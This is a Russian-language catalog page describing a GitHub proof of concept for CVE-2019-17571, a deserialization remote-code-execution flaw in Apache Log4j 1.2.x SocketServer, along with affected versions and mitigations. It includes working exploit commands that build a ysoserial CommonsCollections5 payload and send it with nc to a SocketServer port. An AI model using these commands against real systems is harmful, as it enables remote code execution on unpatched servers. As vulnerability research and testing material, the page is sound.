Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-17571 — Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 | Kitploit
Инструменты/GitHubGitHub/shadow-horse/cve-2019-17571
Vulnerability AnalysisCode AnalysisExploitationPenetration TestingRemote Access Tool
GitHubshadow-horse/cve-2019-17571

CVE-2019-17571

Apache Log4j 1.2.X存在反序列化远程代码执行漏洞

Репозиторий
7856 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-17571/Apache Log4j 1.2.X - уязвимость удаленного выполнения кода при десериализации

Ссылка на предупреждение об уязвимости: https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ

1. Описание уязвимости

Apache Log4j — это основанный на Java инструмент ведения журналов с открытым исходным кодом, разработанный Apache Software Foundation. В версиях Apache Log4j 1.2.X обнаружена уязвимость удаленного выполнения кода при десериализации. Злоумышленник может использовать эту уязвимость для выполнения произвольных вредоносных команд. В состав Log4j 1.2.X входит класс SocketServer, который легко поддается десериализации недоверенных данных. При прослушивании недоверенного сетевого трафика с данными журнала в сочетании с гаджетами десериализации данный класс может быть использован для удаленного выполнения произвольного кода. Уязвимость затрагивает текущую последнюю версию.

2. Опасность уязвимости

Высокая

Затрагиваемые версии
1.2.4 <= Apache Log4j <= 1.2.17 (последняя версия)

Рекомендации по устранению

  1. Обновиться до последней версии серии Apache Log4j 2

  2. Запретить открытие сокетного порта, используемого данным классом, для доступа к Интернету

3. Подтверждение уязвимости

Еще в версии Apache Log4j 2.8.1 существовала уязвимость удаленного выполнения кода при десериализации (CVE-2017-5645), где классом-триггером был org.apache.logging.log4j.core.net.server.TcpSocketServer. В версиях Apache Log4j 1.2.X классом-триггером стал org.apache.log4j.net.SocketServer

1. Запуск уязвимой среды

После поиска в сети выяснилось, что запуск SocketServer в Log4j 1.X осуществляется через команду java, а не через Java-код. (Если есть другие способы запуска, сообщите, пожалуйста.)

Также необходимо скачать затронутые jar-файлы и jar-файлы, позволяющие выполнять код, и добавить их в переменную окружения (ниже приведен пример для Windows). Запустить сервис, передав 3 параметра: порт, конфигурационный файл log4j и каталог lcf:

root@kitploit:~
java -cp log4j-1.2.17.jar;c3p0-0.9.5.2.jar;mchange-commons-java-0.2.11.jar;commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 log4jserver.properties ./  

java -cp log4j-1.2.17.jar:../commons-collections/commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 config/log4jserver.properties ./  

2. Использование RCE POC для log4j2

root@kitploit:~
	java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin  

3. Отправка вредоносного сокета через nc

root@kitploit:~
nc 127.0.0.1 4560 < log4j.curl.bin  

Получение соответствующих jar-файлов: https://github.com/shadow-horse/Vulenvironment/libs

Скачать инструмент